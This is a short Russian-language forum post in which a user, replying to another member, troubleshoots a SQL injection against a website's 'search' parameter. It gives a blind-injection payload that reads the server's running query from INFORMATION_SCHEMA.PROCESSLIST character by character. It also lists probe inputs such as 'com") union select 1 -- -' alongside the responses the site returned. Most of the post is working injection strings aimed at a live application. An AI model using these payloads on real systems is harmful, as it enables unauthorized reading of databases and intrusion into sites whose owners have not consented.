19.05.2020, 22:33
|
|
Новичок
Регистрация: 07.07.2009
Сообщений: 2
Провел на форуме:
16896
Репутация:
0
|
|
Сообщение от crlf
↑
Каким образом был прочитан текущий запрос?
вот так
Код:
sdfsdf") or id=(select INSTR(' !"#`$%&()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_', (SELECT SUBSTRING(INFO,1,1) FROM INFORMATION_SCHEMA.PROCESSLIST WHERE INFO LIKE "%selfquery%"))) or ("qwerty
Сообщение от crlf
↑
Смею предположить, что запрос не тот, иначе это выглядит как минимум странно
согласен. но как обьяснить вот это
Код:
?search=com // возвращает строки с `com`
?search=qwerty // нет строк с таким вхождением
com") union select 1 -- - // ошибка
qwerty") union select 1 -- - // ошиби нет, ничего не возвращает
|
|
|